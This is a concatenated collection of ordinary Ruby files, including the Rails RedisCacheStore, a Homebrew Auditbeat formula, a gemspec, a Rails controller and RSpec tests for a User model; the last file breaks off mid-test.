def add_span_protos span_protos, parent_span_ids
new_span_ids = ::Set.new
span_protos.each do |span_proto|
if parent_span_ids.include? span_proto.parent_span_id
Google::Cloud::Trace::Span.from_grpc span_proto, self
new_span_ids.add span_proto.span_id
end
end
new_span_ids
end
end
end
end
end
| 34.53869 | 80 | 0.564584 |
186b0cf2844f6e63e8bebf1a4f60f97951d997e1 | 518 | require 'rails_helper'
RSpec.describe StoresController, type: :controller do
describe "GET #search" do
it "returns http success" do
get :search
expect(response).to have_http_status(:success)
end
end
describe "GET #index" do
it "returns http success" do
get :index
expect(response).to have_http_status(:success)
end
end
describe "GET #show" do
it "returns http success" do
get :show
expect(response).to have_http_status(:success)
end
end
end
| 19.185185 | 53 | 0.667954 |
bfe0dd0c16070d97d82e017a194992f485d5139b | 69 | class Service < ApplicationRecord
has_many :service_offerings
end
| 13.8 | 33 | 0.826087 |
0154d143586c710508474d233e1e35322712bc92 | 16,645 | # frozen_string_literal: true
begin
gem "redis", ">= 4.0.1"
require "redis"
require "redis/distributed"
rescue LoadError
warn "The Redis cache store requires the redis gem, version 4.0.1 or later. Please add it to your Gemfile: `gem \"redis\", \"~> 4.0\"`"
raise
end
# Prefer the hiredis driver but don't require it.
begin
require "redis/connection/hiredis"
rescue LoadError
end
require "digest/sha2"
require "active_support/core_ext/marshal"
module ActiveSupport
module Cache
module ConnectionPoolLike
def with
yield self
end
end
::Redis.include(ConnectionPoolLike)
::Redis::Distributed.include(ConnectionPoolLike)
# Redis cache store.
#
# Deployment note: Take care to use a *dedicated Redis cache* rather
# than pointing this at your existing Redis server. It won't cope well
# with mixed usage patterns and it won't expire cache entries by default.
#
# Redis cache server setup guide: https://redis.io/topics/lru-cache
#
# * Supports vanilla Redis, hiredis, and Redis::Distributed.
# * Supports Memcached-like sharding across Redises with Redis::Distributed.
# * Fault tolerant. If the Redis server is unavailable, no exceptions are
# raised. Cache fetches are all misses and writes are dropped.
# * Local cache. Hot in-memory primary cache within block/middleware scope.
# * +read_multi+ and +write_multi+ support for Redis mget/mset. Use Redis::Distributed
# 4.0.1+ for distributed mget support.
# * +delete_matched+ support for Redis KEYS globs.
class RedisCacheStore < Store
# Keys are truncated with their own SHA2 digest if they exceed 1kB
MAX_KEY_BYTESIZE = 1024
DEFAULT_REDIS_OPTIONS = {
connect_timeout: 20,
read_timeout: 1,
write_timeout: 1,
reconnect_attempts: 0,
}
DEFAULT_ERROR_HANDLER = -> (method:, returning:, exception:) do
if logger
logger.error { "RedisCacheStore: #{method} failed, returned #{returning.inspect}: #{exception.class}: #{exception.message}" }
end
end
# The maximum number of entries to receive per SCAN call.
SCAN_BATCH_SIZE = 1000
private_constant :SCAN_BATCH_SIZE
# Advertise cache versioning support.
def self.supports_cache_versioning?
true
end
# Support raw values in the local cache strategy.
module LocalCacheWithRaw # :nodoc:
private
def write_entry(key, entry, **options)
if options[:raw] && local_cache
raw_entry = Entry.new(serialize_entry(entry, raw: true))
raw_entry.expires_at = entry.expires_at
super(key, raw_entry, **options)
else
super
end
end
def write_multi_entries(entries, **options)
if options[:raw] && local_cache
raw_entries = entries.map do |key, entry|
raw_entry = Entry.new(serialize_entry(entry, raw: true))
raw_entry.expires_at = entry.expires_at
end.to_h
super(raw_entries, **options)
else
super
end
end
end
prepend Strategy::LocalCache
prepend LocalCacheWithRaw
class << self
# Factory method to create a new Redis instance.
#
# Handles four options: :redis block, :redis instance, single :url
# string, and multiple :url strings.
#
# Option Class Result
# :redis Proc -> options[:redis].call
# :redis Object -> options[:redis]
# :url String -> Redis.new(url: …)
# :url Array -> Redis::Distributed.new([{ url: … }, { url: … }, …])
#
def build_redis(redis: nil, url: nil, **redis_options) #:nodoc:
urls = Array(url)
if redis.is_a?(Proc)
redis.call
elsif redis
redis
elsif urls.size > 1
build_redis_distributed_client urls: urls, **redis_options
else
build_redis_client url: urls.first, **redis_options
end
end
private
def build_redis_distributed_client(urls:, **redis_options)
::Redis::Distributed.new([], DEFAULT_REDIS_OPTIONS.merge(redis_options)).tap do |dist|
urls.each { |u| dist.add_node url: u }
end
end
def build_redis_client(url:, **redis_options)
::Redis.new DEFAULT_REDIS_OPTIONS.merge(redis_options.merge(url: url))
end
end
attr_reader :redis_options
attr_reader :max_key_bytesize
# Creates a new Redis cache store.
#
# Handles four options: :redis block, :redis instance, single :url
# string, and multiple :url strings.
#
# Option Class Result
# :redis Proc -> options[:redis].call
# :redis Object -> options[:redis]
# :url String -> Redis.new(url: …)
# :url Array -> Redis::Distributed.new([{ url: … }, { url: … }, …])
#
# No namespace is set by default. Provide one if the Redis cache
# server is shared with other apps: <tt>namespace: 'myapp-cache'</tt>.
#
# Compression is enabled by default with a 1kB threshold, so cached
# values larger than 1kB are automatically compressed. Disable by
# passing <tt>compress: false</tt> or change the threshold by passing
# <tt>compress_threshold: 4.kilobytes</tt>.
#
# No expiry is set on cache entries by default. Redis is expected to
# be configured with an eviction policy that automatically deletes
# least-recently or -frequently used keys when it reaches max memory.
# See https://redis.io/topics/lru-cache for cache server setup.
#
# Race condition TTL is not set by default. This can be used to avoid
# "thundering herd" cache writes when hot cache entries are expired.
# See <tt>ActiveSupport::Cache::Store#fetch</tt> for more.
def initialize(namespace: nil, compress: true, compress_threshold: 1.kilobyte, expires_in: nil, race_condition_ttl: nil, error_handler: DEFAULT_ERROR_HANDLER, **redis_options)
@redis_options = redis_options
@max_key_bytesize = MAX_KEY_BYTESIZE
@error_handler = error_handler
super namespace: namespace,
compress: compress, compress_threshold: compress_threshold,
expires_in: expires_in, race_condition_ttl: race_condition_ttl
end
def redis
@redis ||= begin
pool_options = self.class.send(:retrieve_pool_options, redis_options)
if pool_options.any?
self.class.send(:ensure_connection_pool_added!)
::ConnectionPool.new(pool_options) { self.class.build_redis(**redis_options) }
else
self.class.build_redis(**redis_options)
end
end
end
def inspect
instance = @redis || @redis_options
"#<#{self.class} options=#{options.inspect} redis=#{instance.inspect}>"
end
# Cache Store API implementation.
#
# Read multiple values at once. Returns a hash of requested keys ->
# fetched values.
def read_multi(*names)
if mget_capable?
instrument(:read_multi, names, options) do |payload|
read_multi_mget(*names).tap do |results|
payload[:hits] = results.keys
end
end
else
super
end
end
# Cache Store API implementation.
#
# Supports Redis KEYS glob patterns:
#
# h?llo matches hello, hallo and hxllo
# h*llo matches hllo and heeeello
# h[ae]llo matches hello and hallo, but not hillo
# h[^e]llo matches hallo, hbllo, ... but not hello
# h[a-b]llo matches hallo and hbllo
#
# Use \ to escape special characters if you want to match them verbatim.
#
# See https://redis.io/commands/KEYS for more.
#
# Failsafe: Raises errors.
def delete_matched(matcher, options = nil)
instrument :delete_matched, matcher do
unless String === matcher
raise ArgumentError, "Only Redis glob strings are supported: #{matcher.inspect}"
end
redis.with do |c|
pattern = namespace_key(matcher, options)
cursor = "0"
# Fetch keys in batches using SCAN to avoid blocking the Redis server.
nodes = c.respond_to?(:nodes) ? c.nodes : [c]
nodes.each do |node|
begin
cursor, keys = node.scan(cursor, match: pattern, count: SCAN_BATCH_SIZE)
node.del(*keys) unless keys.empty?
end until cursor == "0"
end
end
end
end
# Cache Store API implementation.
#
# Increment a cached value. This method uses the Redis incr atomic
# operator and can only be used on values written with the :raw option.
# Calling it on a value not stored with :raw will initialize that value
# to zero.
#
# Failsafe: Raises errors.
def increment(name, amount = 1, options = nil)
instrument :increment, name, amount: amount do
failsafe :increment do
options = merged_options(options)
key = normalize_key(name, options)
redis.with do |c|
c.incrby(key, amount).tap do
write_key_expiry(c, key, options)
end
end
end
end
end
# Cache Store API implementation.
#
# Decrement a cached value. This method uses the Redis decr atomic
# operator and can only be used on values written with the :raw option.
# Calling it on a value not stored with :raw will initialize that value
# to zero.
#
# Failsafe: Raises errors.
def decrement(name, amount = 1, options = nil)
instrument :decrement, name, amount: amount do
failsafe :decrement do
options = merged_options(options)
key = normalize_key(name, options)
redis.with do |c|
c.decrby(key, amount).tap do
write_key_expiry(c, key, options)
end
end
end
end
end
# Cache Store API implementation.
#
# Removes expired entries. Handled natively by Redis least-recently-/
# least-frequently-used expiry, so manual cleanup is not supported.
def cleanup(options = nil)
super
end
# Clear the entire cache on all Redis servers. Safe to use on
# shared servers if the cache is namespaced.
#
# Failsafe: Raises errors.
def clear(options = nil)
failsafe :clear do
if namespace = merged_options(options)[:namespace]
delete_matched "*", namespace: namespace
else
redis.with { |c| c.flushdb }
end
end
end
def mget_capable? #:nodoc:
set_redis_capabilities unless defined? @mget_capable
@mget_capable
end
def mset_capable? #:nodoc:
set_redis_capabilities unless defined? @mset_capable
@mset_capable
end
private
def set_redis_capabilities
case redis
when Redis::Distributed
@mget_capable = true
@mset_capable = false
else
@mget_capable = true
@mset_capable = true
end
end
# Store provider interface:
# Read an entry from the cache.
def read_entry(key, **options)
failsafe :read_entry do
raw = options&.fetch(:raw, false)
deserialize_entry(redis.with { |c| c.get(key) }, raw: raw)
end
end
def read_multi_entries(names, **options)
if mget_capable?
read_multi_mget(*names)
else
super
end
end
def read_multi_mget(*names)
options = names.extract_options!
options = merged_options(options)
return {} if names == []
raw = options&.fetch(:raw, false)
keys = names.map { |name| normalize_key(name, options) }
values = failsafe(:read_multi_mget, returning: {}) do
redis.with { |c| c.mget(*keys) }
end
names.zip(values).each_with_object({}) do |(name, value), results|
if value
entry = deserialize_entry(value, raw: raw)
unless entry.nil? || entry.expired? || entry.mismatched?(normalize_version(name, options))
results[name] = entry.value
end
end
end
end
# Write an entry to the cache.
#
# Requires Redis 2.6.12+ for extended SET options.
def write_entry(key, entry, unless_exist: false, raw: false, expires_in: nil, race_condition_ttl: nil, **options)
serialized_entry = serialize_entry(entry, raw: raw)
# If race condition TTL is in use, ensure that cache entries
# stick around a bit longer after they would have expired
# so we can purposefully serve stale entries.
if race_condition_ttl && expires_in && expires_in > 0 && !raw
expires_in += 5.minutes
end
failsafe :write_entry, returning: false do
if unless_exist || expires_in
modifiers = {}
modifiers[:nx] = unless_exist
modifiers[:px] = (1000 * expires_in.to_f).ceil if expires_in
redis.with { |c| c.set key, serialized_entry, **modifiers }
else
redis.with { |c| c.set key, serialized_entry }
end
end
end
def write_key_expiry(client, key, options)
if options[:expires_in] && client.ttl(key).negative?
client.expire key, options[:expires_in].to_i
end
end
# Delete an entry from the cache.
def delete_entry(key, options)
failsafe :delete_entry, returning: false do
redis.with { |c| c.del key }
end
end
# Deletes multiple entries in the cache. Returns the number of entries deleted.
def delete_multi_entries(entries, **_options)
redis.with { |c| c.del(entries) }
end
# Nonstandard store provider API to write multiple values at once.
def write_multi_entries(entries, expires_in: nil, **options)
if entries.any?
if mset_capable? && expires_in.nil?
failsafe :write_multi_entries do
redis.with { |c| c.mapped_mset(serialize_entries(entries, raw: options[:raw])) }
end
else
super
end
end
end
# Truncate keys that exceed 1kB.
def normalize_key(key, options)
truncate_key super&.b
end
def truncate_key(key)
if key && key.bytesize > max_key_bytesize
suffix = ":sha2:#{::Digest::SHA2.hexdigest(key)}"
truncate_at = max_key_bytesize - suffix.bytesize
"#{key.byteslice(0, truncate_at)}#{suffix}"
else
key
end
end
def deserialize_entry(serialized_entry, raw:)
if serialized_entry
if raw
Entry.new(serialized_entry)
else
Marshal.load(serialized_entry)
end
end
end
def serialize_entry(entry, raw: false)
if raw
entry.value.to_s
else
Marshal.dump(entry)
end
end
def serialize_entries(entries, raw: false)
entries.transform_values do |entry|
serialize_entry entry, raw: raw
end
end
def failsafe(method, returning: nil)
yield
rescue ::Redis::BaseError => e
handle_exception exception: e, method: method, returning: returning
returning
end
def handle_exception(exception:, method:, returning:)
if @error_handler
@error_handler.(method: method, exception: exception, returning: returning)
end
rescue => failsafe
warn "RedisCacheStore ignored exception in handle_exception: #{failsafe.class}: #{failsafe.message}\n #{failsafe.backtrace.join("\n ")}"
end
end
end
end
| 33.626263 | 181 | 0.587504 |
6acdec1595444cfa3e1d61d401e54f4a04807569 | 1,167 | class MoviesController < ApplicationController
before_action :set_movie, only: [:show, :edit, :update, :destroy]
# GET /movies
def index
@movies = Movie.all
end
# GET /movies/1
def show
end
# GET /movies/new
def new
@movie = Movie.new
end
# GET /movies/1/edit
def edit
end
# POST /movies
def create
@movie = Movie.new(movie_params)
if @movie.save
redirect_to @movie, notice: 'Movie was successfully created.'
else
render action: 'new'
end
end
# PATCH/PUT /movies/1
def update
if @movie.update(movie_params)
redirect_to @movie, notice: 'Movie was successfully updated.'
else
render action: 'edit'
end
end
# DELETE /movies/1
def destroy
@movie.destroy
redirect_to movies_url, notice: 'Movie was successfully destroyed.'
end
private
# Use callbacks to share common setup or constraints between actions.
def set_movie
@movie = Movie.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
def movie_params
params.require(:movie).permit(:title, :description, :release_date, :rating)
end
end
| 19.779661 | 81 | 0.659811 |
9111b146846ceb8c6a571aa73b11129b08fb4c24 | 4,406 | class Auditbeat < Formula
desc "Lightweight Shipper for Audit Data"
homepage "https://www.elastic.co/products/beats/auditbeat"
url "https://github.com/elastic/beats.git",
:tag => "v6.8.3",
:revision => "9be0dc0ce65850ca0efb7310a87affa193a513a2"
head "https://github.com/elastic/beats.git"
bottle do
cellar :any_skip_relocation
sha256 "7b830c220246bff5b9933763416d5abfebdd926aff81afa39bdd9dfdfd5dc3c9" => :catalina
sha256 "7da4bb108a66964330626f6c5686b154ba2d7fe25c07261e2983ed8b6247795a" => :mojave
sha256 "27f96ccc35baf1d0131d865ca7b185ef26e80e601942f342171ca73e89dbd8a7" => :high_sierra
sha256 "1c3e774898129fbf3972a36657313bd1099d9479c9b05235cc50422410f4f552" => :sierra
end
depends_on "go" => :build
depends_on "python@2" => :build # does not support Python 3
resource "virtualenv" do
url "https://files.pythonhosted.org/packages/8b/f4/360aa656ddb0f4168aeaa1057d8784b95d1ce12f34332c1cf52420b6db4e/virtualenv-16.3.0.tar.gz"
sha256 "729f0bcab430e4ef137646805b5b1d8efbb43fe53d4a0f33328624a84a5121f7"
end
# Patch required to build against go 1.11 (Can be removed with v7.0.0)
# partially backport of https://github.com/elastic/beats/commit/8d8eaf34a6cb5f3b4565bf40ca0dc9681efea93c
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/a0f8cdc0/auditbeat/go1.11.diff"
sha256 "8a00cb0265b6e2de3bc76f14f2ee4f1a5355dad490f3db9288d968b3e95ae0eb"
end
def install
# remove non open source files
rm_rf "x-pack"
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/elastic/beats").install buildpath.children
ENV.prepend_create_path "PYTHONPATH", buildpath/"vendor/lib/python2.7/site-packages"
resource("virtualenv").stage do
system "python", *Language::Python.setup_install_args(buildpath/"vendor")
end
ENV.prepend_path "PATH", buildpath/"vendor/bin" # for virtualenv
ENV.prepend_path "PATH", buildpath/"bin" # for mage (build tool)
cd "src/github.com/elastic/beats/auditbeat" do
# don't build docs because it would fail creating the combined OSS/x-pack
# docs and we aren't installing them anyway
inreplace "magefile.go", "mage.GenerateModuleIncludeListGo, Docs)",
"mage.GenerateModuleIncludeListGo)"
system "make", "mage"
# prevent downloading binary wheels during python setup
system "make", "PIP_INSTALL_COMMANDS=--no-binary :all", "python-env"
system "mage", "-v", "build"
system "mage", "-v", "update"
(etc/"auditbeat").install Dir["auditbeat.*", "fields.yml"]
(libexec/"bin").install "auditbeat"
prefix.install "build/kibana"
end
prefix.install_metafiles buildpath/"src/github.com/elastic/beats"
(bin/"auditbeat").write <<~EOS
#!/bin/sh
exec #{libexec}/bin/auditbeat \
--path.config #{etc}/auditbeat \
--path.data #{var}/lib/auditbeat \
--path.home #{prefix} \
--path.logs #{var}/log/auditbeat \
"$@"
EOS
end
def post_install
(var/"lib/auditbeat").mkpath
(var/"log/auditbeat").mkpath
end
plist_options :manual => "auditbeat"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/auditbeat</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
(testpath/"files").mkpath
(testpath/"config/auditbeat.yml").write <<~EOS
auditbeat.modules:
- module: file_integrity
paths:
- #{testpath}/files
output.file:
path: "#{testpath}/auditbeat"
filename: auditbeat
EOS
pid = fork do
exec "#{bin}/auditbeat", "-path.config", testpath/"config", "-path.data", testpath/"data"
end
sleep 5
begin
touch testpath/"files/touch"
sleep 30
s = IO.readlines(testpath/"auditbeat/auditbeat").last(1)[0]
assert_match "\"action\":\[\"created\"\]", s
realdirpath = File.realdirpath(testpath)
assert_match "\"path\":\"#{realdirpath}/files/touch\"", s
ensure
Process.kill "SIGINT", pid
Process.wait pid
end
end
end
| 33.633588 | 141 | 0.670676 |
39c36b8246347126f483e8fcbf979397bac29bf2 | 1,103 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'rapid_api/version'
Gem::Specification.new do |spec|
spec.name = 'rapidapi_connect'
spec.version = RapidAPI::VERSION
spec.authors = ['Unathi Chonco']
spec.email = ['[email protected]']
spec.summary = %q{Connect to blocks on the rapidapi.com marketplace}
spec.description = %q{This Gem allows you to connect to RapidAPI blocks in your ruby app.}
spec.homepage = 'https://github.com/choncou/RapidAPIConnect_ruby'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler', '~> 1.13'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec', '~> 3.0'
spec.add_development_dependency 'byebug', '~> 9.0', '>= 9.0.6'
end
| 38.034483 | 94 | 0.653672 |
b97541d38a5abe779823812a7354e538a26cab3f | 20,817 | require 'rails_helper'
require 'digest/md5'
describe User, type: :model do
before do
allow_any_instance_of(User).to receive(:update_index).and_return(true)
end
let(:topic) { create :topic }
let(:user) { create :user }
let(:user2) { create :user }
let(:reply) { create :reply }
let(:user_for_delete1) { create :user }
let(:user_for_delete2) { create :user }
describe 'user_type' do
it { expect(user.user_type).to eq :user }
end
describe 'login format' do
context 'huacnlee' do
let(:user) { build(:user, login: 'huacnlee') }
it { expect(user.valid?).to eq true }
end
context 'huacnlee-github' do
let(:user) { build(:user, login: 'huacnlee-github') }
it { expect(user.valid?).to eq true }
end
context 'huacnlee_github' do
let(:user) { build(:user, login: 'huacnlee_github') }
it { expect(user.valid?).to eq true }
end
context 'huacnlee12' do
let(:user) { build(:user, login: 'huacnlee12') }
it { expect(user.valid?).to eq true }
end
context '123411' do
let(:user) { build(:user, login: '123411') }
it { expect(user.valid?).to eq true }
end
context 'zicheng.lhs' do
let(:user) { build(:user, login: 'zicheng.lhs') }
it { expect(user.valid?).to eq true }
end
context 'll&&^12' do
let(:user) { build(:user, login: '*ll&&^12') }
it { expect(user.valid?).to eq false }
end
context 'abdddddc$' do
let(:user) { build(:user, login: 'abdddddc$') }
it { expect(user.valid?).to eq false }
end
context '$abdddddc' do
let(:user) { build(:user, login: '$abdddddc') }
it { expect(user.valid?).to eq false }
end
context 'aaa*11' do
let(:user) { build(:user, login: 'aaa*11') }
it { expect(user.valid?).to eq false }
end
describe 'Login allow upcase downcase both' do
let(:user1) { create(:user, login: 'ReiIs123') }
it 'should work' do
expect(user1.login).to eq('ReiIs123')
expect(User.find_by_login('ReiIs123').id).to eq(user1.id)
expect(User.find_by_login('reiis123').id).to eq(user1.id)
expect(User.find_by_login('rEIIs123').id).to eq(user1.id)
end
end
end
describe '#read_topic?' do
before do
allow_any_instance_of(User).to receive(:update_index).and_return(true)
Rails.cache.write("user:#{user.id}:topic_read:#{topic.id}", nil)
end
it 'marks the topic as unread' do
expect(user.topic_read?(topic)).to eq(false)
user.read_topic(topic)
expect(user.topic_read?(topic)).to eq(true)
expect(user2.topic_read?(topic)).to eq(false)
end
it 'marks the topic as unread when got new reply' do
topic.replies << reply
expect(user.topic_read?(topic)).to eq(false)
user.read_topic(topic)
expect(user.topic_read?(topic)).to eq(true)
end
it 'user can soft_delete' do
user_for_delete1.soft_delete
user_for_delete1.reload
expect(user_for_delete1.state).to eq('deleted')
user_for_delete2.soft_delete
user_for_delete1.reload
expect(user_for_delete1.state).to eq('deleted')
expect(user_for_delete1.authorizations).to eq([])
end
end
describe '#filter_readed_topics' do
let(:topics) { create_list(:topic, 3) }
it 'should work' do
user.read_topic(topics[1])
user.read_topic(topics[2])
expect(user.filter_readed_topics(topics)).to eq([topics[1].id, topics[2].id])
end
it 'should work when params is nil or empty' do
expect(user.filter_readed_topics(nil)).to eq([])
expect(user.filter_readed_topics([])).to eq([])
end
end
describe 'location' do
it 'should not get results when user location not set' do
Location.count == 0
end
it 'should get results when user location is set' do
user.location = 'hangzhou'
user2.location = 'Hongkong'
Location.count == 2
end
it 'should update users_count when user location changed' do
old_name = user.location
new_name = 'HongKong'
old_location = Location.location_find_by_name(old_name)
hk_location = create(:location, name: new_name, users_count: 20)
user.location = new_name
user.save
user.reload
expect(user.location).to eq(new_name)
expect(user.location_id).to eq(hk_location.id)
expect(Location.location_find_by_name(old_name).users_count).to eq(old_location.users_count - 1)
expect(Location.location_find_by_name(new_name).users_count).to eq(hk_location.users_count + 1)
end
end
describe 'admin?' do
let(:admin) { create :admin }
it 'should know you are an admin' do
expect(admin).to be_admin
end
it 'should know normal user is not admin' do
expect(user).not_to be_admin
end
end
describe 'wiki_editor?' do
let(:admin) { create :admin }
it 'should know admin is wiki editor' do
expect(admin).to be_wiki_editor
end
it 'should know verified user is wiki editor' do
user.verified = true
expect(user).to be_wiki_editor
end
it 'should know not verified user is not a wiki editor' do
user.verified = false
expect(user).not_to be_wiki_editor
end
end
describe 'newbie?' do
it 'should true when user created_at less than a week' do
user.verified = false
allow(Setting).to receive(:newbie_limit_time).and_return(1.days.to_i)
user.created_at = 6.hours.ago
expect(user.newbie?).to be_truthy
end
it 'should false when user is verified' do
user.verified = true
expect(user.newbie?).to be_falsey
end
context 'Unverfied user with 2.days.ago registed.' do
let(:user) { build(:user, verified: false, created_at: 2.days.ago) }
it 'should tru with 1 days limit' do
allow(Setting).to receive(:newbie_limit_time).and_return(1.days.to_i)
expect(user.newbie?).to be_falsey
end
it 'should false with 3 days limit' do
allow(Setting).to receive(:newbie_limit_time).and_return(3.days.to_i)
expect(user.newbie?).to be_truthy
end
it 'should false with nil limit' do
allow(Setting).to receive(:newbie_limit_time).and_return(nil)
expect(user.newbie?).to be_falsey
end
it 'should false with 0 limit' do
allow(Setting).to receive(:newbie_limit_time).and_return('0')
expect(user.newbie?).to be_falsey
end
end
end
describe 'roles' do
subject { user }
context 'when is a new user' do
let(:user) { create :user }
it { expect(user.roles?(:member)).to eq true }
end
context 'when is a blocked user' do
let(:user) { create :blocked_user }
it { expect(user.roles?(:member)).not_to eq true }
end
context 'when is a deleted user' do
let(:user) { create :blocked_user }
it { expect(user.roles?(:member)).not_to eq true }
end
context 'when is admin' do
let(:user) { create :admin }
it { expect(user.roles?(:admin)).to eq true }
end
context 'when is wiki editor' do
let(:user) { create :wiki_editor }
it { expect(user.roles?(:wiki_editor)).to eq true }
end
context 'when ask for some random role' do
let(:user) { create :user }
it { expect(user.roles?(:savior_of_the_broken)).not_to eq true }
end
end
describe 'github url' do
subject { create(:user, github: 'monkey') }
let(:expected) { 'https://github.com/monkey' }
context 'user name provided correct' do
describe '#github_url' do
subject { super().github_url }
it { is_expected.to eq(expected) }
end
end
context 'user name provided as full url' do
before { allow(subject).to receive(:github).and_return('http://github.com/monkey') }
describe '#github_url' do
subject { super().github_url }
it { is_expected.to eq(expected) }
end
end
end
describe 'website_url' do
subject { create(:user, website: 'monkey.com') }
let(:expected) { 'http://monkey.com' }
context 'website without http://' do
describe '#website_url' do
subject { super().website_url }
it { is_expected.to eq(expected) }
end
end
context 'website with http://' do
before { allow(subject).to receive(:github).and_return('http://monkey.com') }
describe '#website_url' do
subject { super().website_url }
it { is_expected.to eq(expected) }
end
end
end
describe 'favorite topic' do
it 'should favorite a topic' do
user.favorite_topic(topic.id)
expect(user.favorite_topic_ids.include?(topic.id)).to eq(true)
expect(user.favorite_topic(nil)).to eq(false)
expect(user.favorite_topic(topic.id)).to eq(true)
expect(user.favorite_topic_ids.include?(topic.id)).to eq(true)
expect(user.favorite_topic?(topic.id)).to eq(true)
end
it 'should unfavorite a topic' do
user.unfavorite_topic(topic.id)
expect(user.favorite_topic_ids.include?(topic.id)).to eq(false)
expect(user.unfavorite_topic(nil)).to eq(false)
expect(user.unfavorite_topic(topic)).to eq(true)
expect(user.favorite_topic?(topic)).to eq(false)
end
end
describe 'Like' do
let(:topic) { create :topic }
let(:user) { create :user }
let(:user2) { create :user }
describe 'like topic' do
it 'can like/unlike topic' do
user.like(topic)
topic.reload
expect(topic.likes_count).to eq(1)
expect(topic.like_by_user_ids).to include(user.id)
user2.like(topic)
topic.reload
expect(topic.likes_count).to eq(2)
expect(topic.like_by_user_ids).to include(user2.id)
expect(user.liked?(topic)).to eq(true)
user2.unlike(topic)
topic.reload
expect(topic.likes_count).to eq(1)
expect(topic.like_by_user_ids).not_to include(user2.id)
# can't like itself
topic.user.like(topic)
topic.reload
expect(topic.likes_count).to eq(1)
expect(topic.like_by_user_ids).not_to include(topic.user_id)
# can't unlike itself
topic.user.unlike(topic)
topic.reload
expect(topic.likes_count).to eq(1)
expect(topic.like_by_user_ids).not_to include(topic.user_id)
end
it 'can tell whether or not liked by a user' do
expect(user.like_topic?(topic)).to be_falsey
user.like(topic)
topic.reload
expect(user.like_topic?(topic)).to be_truthy
expect(topic.like_by_users).to include(user)
end
end
describe 'like reply' do
let(:reply) { create :reply }
it 'should work' do
user.like(reply)
expect(user.like_reply?(reply)).to be_truthy
end
describe '.like_reply_ids_by_replies' do
let(:replies) { create_list(:reply, 3) }
it 'should work' do
user.like(replies[0])
user.like(replies[2])
like_ids = user.like_reply_ids_by_replies(replies)
expect(like_ids).not_to include(replies[1].id)
expect(like_ids).to include(replies[0].id, replies[2].id)
end
end
end
end
describe 'email and email_md5' do
it 'should generate email_md5 when give value to email attribute' do
user.email = '[email protected]'
user.save
expect(user.email_md5).to eq(Digest::MD5.hexdigest('[email protected]'))
expect(user.email).to eq('[email protected]')
end
it 'should genrate email_md5 with params' do
u = User.new
u.email = '[email protected]'
expect(u.email).to eq('[email protected]')
expect(u.email_md5).to eq(Digest::MD5.hexdigest('[email protected]'))
end
end
describe '#find_by_login!' do
let(:user) { create :user }
it 'should work' do
u = User.find_by_login!(user.login)
expect(u.id).to eq user.id
expect(u.login).to eq(user.login)
end
it 'should ignore case' do
u = User.find_by_login!(user.login.upcase)
expect(u.id).to eq user.id
end
it 'should raise DocumentNotFound error' do
expect do
User.find_by_login!(user.login + '1')
end.to raise_error(ActiveRecord::RecordNotFound)
end
it 'should railse DocumentNotFound if have bad login' do
expect do
User.find_by_login!(user.login + ')')
end.to raise_error(ActiveRecord::RecordNotFound)
end
context 'Simple prefix user exists' do
let(:user1) { create :user, login: 'foo' }
let(:user2) { create :user, login: 'foobar' }
let(:user2) { create :user, login: 'a2foo' }
it 'should get right user' do
u = User.find_by_login!(user1.login)
expect(u.id).to eq user1.id
expect(u.login).to eq(user1.login)
end
end
end
describe '.block_user' do
let(:user) { create :user }
let(:u2) { create :user }
let(:u3) { create :user }
it 'should work' do
user.block_user(u2)
user.block_user(u3)
expect(user.block_user_ids).to include(u2.id, u3.id)
expect(u2.block_by_user_ids).to include(user.id)
expect(u3.block_by_user_ids).to include(user.id)
end
end
describe '.follow_user' do
let(:u1) { create :user }
let(:u2) { create :user }
let(:u3) { create :user }
it 'should work' do
u1.follow_user(u2)
u1.follow_user(u3)
expect(u1.follow_user_ids).to include(u2.id, u3.id)
expect(u2.follow_by_user_ids).to eq [u1.id]
expect(u3.follow_by_user_ids).to eq [u1.id]
# Unfollow
u1.unfollow_user(u3)
expect(u1.follow_user_ids).to eq [u2.id]
u3.reload
expect(u3.follow_by_user_ids).to eq []
end
end
describe '.favorites_count' do
let(:u1) { create :user }
it 'should work' do
u1.favorite_topic(1)
u1.favorite_topic(2)
expect(u1.favorites_count).to eq(2)
end
end
describe '.level / .level_name' do
let(:u1) { create(:user) }
context 'admin' do
it 'should work' do
allow(u1).to receive(:admin?).and_return(true)
expect(u1.level).to eq('admin')
expect(u1.level_name).to eq('管理员')
end
end
context 'vip' do
it 'should work' do
allow(u1).to receive(:verified?).and_return(true)
expect(u1.level).to eq('vip')
expect(u1.level_name).to eq('高级会员')
end
end
context 'blocked' do
it 'should work' do
allow(u1).to receive(:blocked?).and_return(true)
expect(u1.level).to eq('blocked')
expect(u1.level_name).to eq('禁言用户')
end
end
context 'newbie' do
it 'should work' do
allow(u1).to receive(:newbie?).and_return(true)
expect(u1.level).to eq('newbie')
expect(u1.level_name).to eq('新手')
end
end
context 'normal' do
it 'should work' do
allow(u1).to receive(:newbie?).and_return(false)
expect(u1.level).to eq('normal')
expect(u1.level_name).to eq('会员')
end
end
end
describe '.letter_avatar_url' do
let(:user) { create(:user) }
it 'should work' do
expect(user.letter_avatar_url(240)).to include("#{Setting.base_url}/system/letter_avatars/")
end
end
describe '.avatar?' do
it 'should return false when avatar is nil' do
u = User.new
u[:avatar] = nil
expect(u.avatar?).to eq(false)
end
it 'should return true when avatar is not nil' do
u = User.new
u[:avatar] = '1234'
expect(u.avatar?).to eq(true)
end
end
describe '#find_for_database_authentication' do
let!(:user) { create(:user, login: 'foo', email: '[email protected]') }
it 'should work' do
